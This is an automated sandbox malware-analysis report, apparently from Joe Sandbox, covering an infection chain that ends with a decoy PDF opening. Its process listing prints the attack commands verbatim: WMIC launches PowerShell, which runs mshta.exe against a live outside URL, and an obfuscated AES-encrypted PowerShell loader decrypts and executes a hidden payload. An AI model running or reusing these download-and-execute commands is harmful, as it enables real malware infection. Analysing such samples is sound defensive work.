                                                                                                                                                                                                        2024-12-21 14:02:25 UTC1369INData Raw: 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 3a 66 6f 63 75 73 2c 23 61 73 74 2d 63 6f 75 70 6f 6e 2d 63 6f 64 65 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 70 23 61 73 74 2d 63 6f 75 70 6f 6e 2d 74 72 69 67 67 65 72 3a 66
                                                                                                                                                                                                        Data Ascii: t2-container--default .select2-selection--single:focus,#ast-coupon-code:focus,.woocommerce.woocommerce-js .quantity input[type=number]:focus,.woocommerce-js .woocommerce-mini-cart-item .quantity input[type=number]:focus,.woocommerce p#ast-coupon-trigger:f


                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:09:02:09
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')"
                                                                                                                                                                                                        Imagebase:0x7ff6b3c10000
                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                        Start time:09:02:09
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                        Start time:09:02:10
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')
                                                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                        Start time:09:02:10
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:09:02:12
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy"
                                                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                        Start time:09:02:12
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy
                                                                                                                                                                                                        Imagebase:0x7ff6718c0000
                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                        Start time:09:02:16
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                        Start time:09:02:17
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)
                                                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                        Start time:09:02:17
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                        Start time:09:02:22
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Company%20Information.pdf"
                                                                                                                                                                                                        Imagebase:0x7ff702560000
                                                                                                                                                                                                        File size:5'641'176 bytes
                                                                                                                                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                        Start time:09:02:26
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                                                                                                                                        File size:3'581'912 bytes
                                                                                                                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                        Start time:09:02:26
                                                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1632,i,8924348424998603111,1472651231245684160,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                                                                                                                                        File size:3'581'912 bytes
                                                                                                                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00007FFAACA733B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.1315621989.00007FFAACA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA70000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaaca70000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                          • Instruction ID: 0fea312f1fe1cbbaed81bb40477e40c1b2994471fc18b36391a8319e0e82adfb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E01677115CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC36A1DA36E892CB45

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00000202BE940FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000B.00000003.1521779236.00000202BE940000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000202BE940000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_11_3_202be940000_mshta.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                          • Instruction ID: e649886d3ddacc32055c498543deacb5b75d0f30aed525a646bee336f39be4f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D59002054A590695E82411911C4D35DA1506B88154FD844D1481790145D44D02DE1153
                                                                                                                                                                                                          Function 00000202BE940FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000B.00000003.1521779236.00000202BE940000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000202BE940000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_11_3_202be940000_mshta.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                          • Instruction ID: e649886d3ddacc32055c498543deacb5b75d0f30aed525a646bee336f39be4f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D59002054A590695E82411911C4D35DA1506B88154FD844D1481790145D44D02DE1153
                                                                                                                                                                                                          Function 00000202BE940FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000B.00000003.1521779236.00000202BE940000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000202BE940000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_11_3_202be940000_mshta.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                          • Instruction ID: e649886d3ddacc32055c498543deacb5b75d0f30aed525a646bee336f39be4f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D59002054A590695E82411911C4D35DA1506B88154FD844D1481790145D44D02DE1153

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00007FFAAB2C38CC Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1518358151.00007FFAAB2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab2c0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8h$8h$8h$8h
                                                                                                                                                                                                          • API String ID: 0-4025821918
                                                                                                                                                                                                          • Opcode ID: 45bf734576d15b6b732644320bdab41b90752788d5d270fe1962341d29532936
                                                                                                                                                                                                          • Instruction ID: 412cf232874dd177888f72b1a98e5b6805569c1eea152f329ea10dd4c2b7821b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45bf734576d15b6b732644320bdab41b90752788d5d270fe1962341d29532936
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66513593A0EB864FE3AA836C58511B46FD1EF4B290B0849FBD04DC71E7D8299C4D83C1
                                                                                                                                                                                                          Function 00007FFAAB2C45AC Relevance: .5, Instructions: 535COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1518358151.00007FFAAB2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab2c0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 90484087b46b452e237087505c0370ea5db2a4e605391d6781fc36304548b7fd
                                                                                                                                                                                                          • Instruction ID: 2b619831242b61d4741add3ac05c38a48cb2305d030c28259d2d35d5e43a36d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90484087b46b452e237087505c0370ea5db2a4e605391d6781fc36304548b7fd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F1F2A290EBC68FE75787784C252A67FA1DF572A0B1845FBD09CC71E7D908580EC392
                                                                                                                                                                                                          Function 00007FFAAB1F3DF2 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1517790286.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab1f0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 76c789ff6abcef7fc18f538eb459dc538eb3d655cacf4510e01418436061ee46
                                                                                                                                                                                                          • Instruction ID: 0fcea435820b35c2cd6d473b42aee8fa60486b0a29a3bffa8c392ad983d7ced7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76c789ff6abcef7fc18f538eb459dc538eb3d655cacf4510e01418436061ee46
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACD1B131A18A498FDB89DF6CC495AE977F1FF68344F14816AE00DD7296CA34E885CBC1
                                                                                                                                                                                                          Function 00007FFAAB2C721A Relevance: .4, Instructions: 417COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1518358151.00007FFAAB2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab2c0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2f0def468a9a4e63cd0bca087d16c7bced55fb32ec588cd4128c26b3d1b88651
                                                                                                                                                                                                          • Instruction ID: 8bc2f46f94dfc0d95465d0c9dea094205223ac72d4874413d372077e8b46a820
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0def468a9a4e63cd0bca087d16c7bced55fb32ec588cd4128c26b3d1b88651
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C14A72A0EA8A8FE7A69B6888155B57FF1EF17350B0440FBE44DC71B7D918A80DC391
                                                                                                                                                                                                          Function 00007FFAAB2C472A Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1518358151.00007FFAAB2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab2c0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cf1990559e78076a5d2b2d49953d0f0bd65a7e1fa9ace5b55af53cdab60bc1d7
                                                                                                                                                                                                          • Instruction ID: c602e8a4e0eb1cb8ffc3d0d0c0f43767e5d8f75988e9f7fc0b10c270b5091576
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1990559e78076a5d2b2d49953d0f0bd65a7e1fa9ace5b55af53cdab60bc1d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441E663E1FBC78BF3AA57688C6127665C2DF97290B5845BBE41DC31EADD1C980C42C1
                                                                                                                                                                                                          Function 00007FFAAB1F399A Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1517790286.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab1f0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d997ee3a62faf13b70eca91285922622be7102240f6ce7cd0430bfba8c4426db
                                                                                                                                                                                                          • Instruction ID: 644f99003bd91ba7a6323eb6fabb1aabbe1e194f79488bdf5a96e312bf45c447
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d997ee3a62faf13b70eca91285922622be7102240f6ce7cd0430bfba8c4426db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A01263271CB054FD75CEF1CE88146473E1EBD8360F00463EE48AC32ABD925E8428781
                                                                                                                                                                                                          Function 00007FFAAB1F43C5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1517790286.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab1f0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 587a3858de863890fe5ac43614614d114eedf7bc55bba027a52e288c7fae6744
                                                                                                                                                                                                          • Instruction ID: 945e03a8cc6e6a99b654dba2d110fb86fc32a727cc634a2ce020cbd2ff4eea77
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 587a3858de863890fe5ac43614614d114eedf7bc55bba027a52e288c7fae6744
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056EE58AC3661D636E892CB45
                                                                                                                                                                                                          Function 00007FFAAB2C0758 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
